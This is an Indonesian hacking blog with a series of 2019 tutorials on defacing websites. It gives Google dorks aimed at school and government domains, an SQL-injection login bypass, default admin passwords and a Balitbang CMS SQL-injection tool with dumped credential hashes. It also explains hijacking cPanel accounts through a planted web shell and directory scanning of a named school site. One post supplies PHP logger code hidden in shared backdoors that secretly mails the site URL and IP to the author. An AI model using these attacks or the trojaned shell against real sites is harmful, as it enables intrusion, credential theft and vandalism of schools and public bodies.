Jumat, 30 Agustus 2019

Deface SQL Without Quotes

Cara Deface Website Metode SQL 
Without Quotes


Ok,, Pagi semua,, Kali ini gw akan kasih tutorial deface menggunakan metode sql without quotes,, Yah bisa dibilang metode baru karna jarang blog atau yt yang membagikan deface menggunakan metode ini,, gw liat dichannel nya orang barat,, cara sama sih kek bypass ('=''or) atau bypass sql login (or 1=1 limit 1 -- -+) cmn nyari targetnya aja agak susah,, ok langsung aja ga ush lama lama

Dork : Powered by SHODH TECHNOLOGIES (kembangin itu dork default nya)

Login : admin / web-admin

User : \
Pass : ||1#


Langkah awal ngedork dulu digoogle kek biasanya sambil ngopi biar makin voss ,, btw yg gtw masksud ngedork itu gini gw jelasin, ngedork itu = nyari target website yg bisa kita dideface,,


Langkah kedua pilih salah satu website tambahkan /admin or /web-admin untuk loginnya 



Kemudian masukkan user dan password yg gw bagiin diatas 

U:\
P:||1#



Niscaya kalian akan masuk dashboard admin, disini gw akan add berita aja ga akan tanem shell trs rusak,, kasian adminnya juga,,



hehehe done om,, klik sini om hasilnya
happy hacking deface page,, kalaw mau tanem shell trs index jangan lupa backup ler,, 


#share and coment 
#see you in next post
Share:

Minggu, 18 Agustus 2019

How To Reset Cpanel Via Shell Backdoor

Reset CPanel Using Shell Backdoor Only 


Morning !!.. kesempatan kali ini gw mau share cara reset cpanel.. udh pada tau cpanel blom? Kalaw blm tau google dulu sana:V".. aowksowkwok canda":B.. cpanel adalah control panel yg digunakan untuk mengatur website. membuat email account dan banyak hal lainnya seperti instalasi script.. dan skrng kita akan bljr cara reset nya.. and btw tutorial ini sangat berguna bagi kalian yg hobby Deface.. lngsng aja siapkan 1 target yg akan direset dan yg sudah kalian tanami shell Backdoor.. usahakan ada fitur "atur ulang kata sandi" seperti gambar dibawah..


Dan tinggalkan target yg seperti ini karna tidak ada fitur resetnya..


Balik ke tutorial.. buka & akses shell Backdoor kalian.. pergi ke dir /home/user/ kemudian buat file .contactinfo dan tambahan alamat email kalian


Lanjut pergi ke dir /home/user/.cpanel cari bagian .contactinfo lalu ubah lagi dngn email aktif kalian..


Kemudian saatnya reset.. masukan usernya.. user yg dimaksud adalah /home/"user"/public_html/.. beda web beda user


Next pasti suruh masukin email nya buat send Security Code.. masukan email yg kalian taruh dishell tadi..



Tunggu aja sampe -+10 mnt.. prosesnya emng agak lama.. cek inbox email kalian cek inbox spam kalian ntar pasti ada notice nya.. 


Kemudian masukan Security Codenya.. lalu ganti dengan pass yg kalian inginkan.. 



Ntar ada notice lagi kalaw sukses..h3h3h3 :B"..


Lah tinggal login aja dah.. gunakan user & pass yg baru.. taraaa selamat cpanel sukses direset:V".. 


Terakhir.. pesen gw jangan diancur" rin kasian adminnya:V".. sekian dari gw
#share
#moga bermanfaat
Share:

Jumat, 09 Agustus 2019

Berburu Directory Dan File Sensitif

Tutorial Search Direktory
Website


Mungkin lu akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi.. dan mngkin yg sering gw lakuin juga :V".. dan kali ini gw kasih tutorial buat search direktori website.. lumayan kdang gw juga nemu adlog dari cara ini.. fungsinya sih sama kek scanner/dirbuster.. ok lngsng ajaa bahan :

1. Termux
2. Internet lancar
3. Script nya :

$ apt update && apt upgrade
$ apt install python
$ apt install git
$ git clone https://github.com/maurosoria/dirsearch.git
$ cd dirsearch
$ python dirsearch.py -u http://targetmu.com -e php

Pertama-tama kita buka termuxnya.. kalaw gk punya download diplaystore ada.

Kemudian install semua toolsnya dengan perintah script diatas..


Kalaw sudah terpasang tinggal kita dirsearch aja target kita.. gw sih pke target sekolah gw.. perintahnya kek diatas :
$ python dirsearch.py -u http://www.smkn1-sby.sch.id -e php



Kemudian tunggu sampai prosessnya selesai.. 


Terakhir tinggal kita cek aja dah..


Aowkowkwowk mantap ea:V".. tinggal kita cari aja bugnya.. kemudian laporin ke pihak sekolah.. jan diindex tolol .. kasian adminnya mnding nitip file aja:V".. 
#moga bermanfaat


Share:

Minggu, 30 Juni 2019

Deface Web Sekolah Cms Balitbang HashPass

Cara Deface Balitbang Cms 
Website Sekolah Gratis


Malem kawan.. malem ini gw mau share cara deface web sekolah menggunakan metode Balitbang.. kalian yg punya dendam, benci atau apalah ke sekolah kalian mngkin bisa bisa pke cara ini:V".. balitbang sendiri ada bnyk ada yg register 3.5.3.. tpi kalaw gw sih pke tools punya nya master gw afrizal:V".. lngsng aja tutorialnya :

1. Termux (download diplaystore)
2. Sc&Shell Backdoor
3. Dork : 
>intext:"Setup by Website Sekolah Gratis." Ulangan Site:sch.id

>intext:"Setup by cmssekolahku." cbt site:sch.id

>intext:"Setup by Website Sekolah Gratis." rudi site:sch.id

>intext:"Setup by Website Sekolah Gratis." guru bahasa site:sch.id

>intext:"Setup by Website Sekolah Gratis." firman site:sch.id

>intext:"Setup by Website Sekolah Gratis." kenaikan kelas Site:sch.id
(Kembangin ea biar dpet bnyk)

4. Toolsnya :
https://github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php

5. Exploit ; http://web.nya/path/listmemberall.php

Langkah awal dorking digoogle kek biasanyaa .. Btw gw sih suka deface web pemerintah ketimbang web sekolah:V"..


Pilih salah satu target web sekolah yg mau dideface.. kemudian masukan exploitnya /listmemberall.php kalaw vuln blank putih..



Kalaw sudah nemu target buka termux dan install dulu toolsnya.. caranya? 
$git clone https//github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php 

Kemudian 
$cd balitbang-sqli-post-data

Last
$php balitbang.php targetkalian


[+] Data 1 [+]
[+] Username : admin
[+] Password : 5bg848383c1c6c7c4b3c0
[+] End Data [+]

[+] Data 2 [+]
[+] Username : gafar
[+] Password : 5bg848383b3bbb9c0b3c5
[+] End Data [+]

Lah done kan.. terakhir tingggal kita hash passwordnya yg data1.. hashnya private ea bang.. wa gw aja 083831973261:V"..



Kita coba hash data keduanya..



Hehehehe tinggal admin loginnya.. bisa kalian cari sendiri gk ush manja:B".. silahkan coba pantesting web sekolah kalian masing":v".. tanggung jawab ditanggung pemenang>\\<..
#see you in next post
#tuhan bersama jiwa jiwa yg santuy
Share:

Sabtu, 29 Juni 2019

Deface Admin Weak Password 2019

Tutorial Deface CMS Admin
Week Password 2019


Hai kawan..
Kembali lagi dengan gw :V"..  kali ini kita akan belajar Deface menggunakam metode admin week pass.. yahh menurut gw sih ini mah bkn metode tpi orang goblok yg sok sok buat website tpi U&P pasaran:V".. alias gampang ketebak.. caranya sih cukup simpel  sambil merem juga bisa:)' tpi nyari target nya yg agak susah:V".. kan kalaw gk go.id gak nikmat:V".. hehehe ok lngsng tutorialnya : 

~ Shell Bacdoor & Script Deface
~ Dork : 
1. inurl:/admin123/login.php site:.id
2. intitle:login.php site:.go.id
3. inurl:/adminweb/index.php site:.go.id
(Kembangin lagi biar dapet yg fresh)

~ User&Password
user : admin 
password: admin 

user : admin 
password : 123456 

user : admin 
password : admin123

user: administrator
password: administrator

Seperti biasa kita dorking dulu dibrowser kesayangan kita google chrome:V"..


Kemudian kita pilih salah satu target dan login menggunakan u&p yg gw bagiin diatas.. coba aja satu" 


Kalaw sukses kalian akan langsung masuk menuju dashboard adminnya..


Last terserah kalian mau apain tuh web:V".. Saran gw sih mending backup dulu biar ntar kalaw ngindex aman:V".. kalian gk pernah tau mngkn apa yg kalian lakuin skrng bisa aja buat seseorang kehilangan pekerjaan:V".. 
>\\< 

Ok sekian dari gw thanks..
#see you in next post
Share:

Selasa, 11 Juni 2019

Tutorial Membuat Logger Pada ShellBackdoor

Cara Menyisipkan Logger
Dengan Mudah 


Ok kali ini kita akan bljr tentang logger dan shell backdoor.. apasih shell backdoor itu? Shell backdoor adalah file yg digunakan untuk mengontrol semua file file yg ada didalam website.. lalu logger itu apa? Logger adalah proses otomatis pengumpulan dan perekaman data dari sensor untuk tujuan pengarsipan atau tujuan analisis.. singkatnya buat riwayat logging.. Keuntungan memasang Logger di Shell Backdoor adalah kita tidak usah mencari bug pada website, akan tetapi kita tinggal menunggu hasil dari logger yang sudah kita pasang di dalam shell backdoor tersebut.

Misalnya : Gw mempunyai sebuah Shell Backdoor. Gw ubah trs gw tambahin script yang ada di Shell Backdoor tersebut dengan script Logger. Kemudian gw tinggal bagikan kepada teman-teman gw. dan apabila teman gw berhasil mengupload shell tersebut maka otomatis kita akan bisa melihat link yang ditanam melalui email yang sudah kita tulis di script logger tersebut. Mantap bujank:V".. bahannnya dikit :

1. Kita siapkan shell yg akan kita ubah.. kalaw blm punya download digoogle bnyk.. shell indoxploit.. alfashell.. C99 shell dll.. atau bisa chmod disini 

2. Siapkan Script Logger .. 
Seperti ini script nya :

<?php @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'emailkalian@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); ?>

Nb: emailkalian@gmail.com 
Ubah dengan email kalian masing"

Terus bagaimana cara pasangnya? 
Pertama buka shell kalian ditext editor kalian masing".. 


Kemudian copy dan paste script loggernya dibawahnya tulisan "@ini_set('max_execution_time',0);"


Last kalian simpan kemudian share ke teman" agar shellnya ramai digunakan:B".. 

Cara cek kalaw shellnya dipake atau sukses adalah kalian buka gmail kalian.. trs cari bagian spam.. pasti ada pesan loggernya disitu.. tinggal liat aja deh akses shellnya >\\<




Hehehehehhe mayan gk perlu dorking.. tinggal tunggu hasil aja:V".. okok cukup segini aja dari gw.. moga bermanfaat

#Sesungguhnya tuhan bersama orang-orang yg santuy
Share:

Kamis, 06 Juni 2019

Tutorial CreateSubdoFinder (Buatan Sendiri)

Cara Membuat Tools Python
Create Subdofinder


Welcome Back.. Kali ini gw mau kasih tutorial gimana sih caranya bikin tools sendiri yg fungsi tools tersebut adalah untuk menemukan subdomain:V".. heheheh.. masa dari dulu lu suka jadi script kiddie yg bisanya cmn pke tools orang anjer:V".. kgk kan?.. aowkqoqkwowwowkok..  okok langsung aja ke tutorialnya.. disini gw pake bahasa pemrograman python.. knp hrus python? Soalnya module/library python tuh bnyk.. ditambh mudah dipelajari.. dan yg pling gw suka kgk tergantung ama semicolon :V: xdxd.. Disini gw pke python versi 2.7 ya.. lu lu semua yg pro yg udh pke versi 3 menyesuaikan sendiri ea codingannya:V*.... 

Kalian bisa gunakan teks editor kalian masing".. gk ush manja.. download diplaystore bnyk..

- Start Coding
Untuk bagian atas kita ketikkan dulu module/library yg akan kita gunakan.. yaitu requests ..  Contoh :

Import Requests

- Selanjutnya membuat fungsi/method baru.. bebas kalian kasih nama method.. gw pke nama rikues.. lalu wajib diawali dengan syntax def..  seperti ini :

def rikues(url):

- Kemudian masukan syntax berikut kedalam fungsi rikuesnya.. seperti ini :

try: return requests.get("http://"+url) except requests.exceptions.ConnectionError: pass 

- Selanjutnya kita tambahkan variabel string yang berisikan target yg akan kita scan.. contohnya disini gw pke mi.com .. simpan diluar rikuesnya.. seperti ini :

target_url="mi.com" 

- Next kalian buat wordlistnya dulu.. atau bisa copas di Sini

- Setelah Kalian Buat Wordlistnya saatnya memasukan syntax bruteforce seperti ini :

with open("lokasiwordlistmu","r") as wordlist_file: for line in wordlist_file: word=line.strip() test_url=word+"."+target_url response = requests(test_url) if response: print("Subdomain Ditemukan")

- Last Kalaw Digabung Seperti Ini Codingannya :

import requests def rikues(url): try: return requests.get("http://"+url) except requests.exceptions.ConnectionError: pass target_url="mi.com" with open("lokasiwordlistmu", "r") as wordlist_file: for line in wordlist_file: word=line.strip() test_url=word+"."+target_url response = rikues(test_url) if response: print("Subdomain Ditemukan >> "+test_url)



Lalu kalian simpan dengan format .py.. contoh : falkapink.py.. kemudian coba kalian run kan diterminal.. pasti hasil dari subdomain akan keluar.. udh segitu aja dari gw thanks for reading.. kalaw mau gw dah ada github nya ..



#Minal adzin wal faidzin 
#Happy Hacking Deface Page
Share: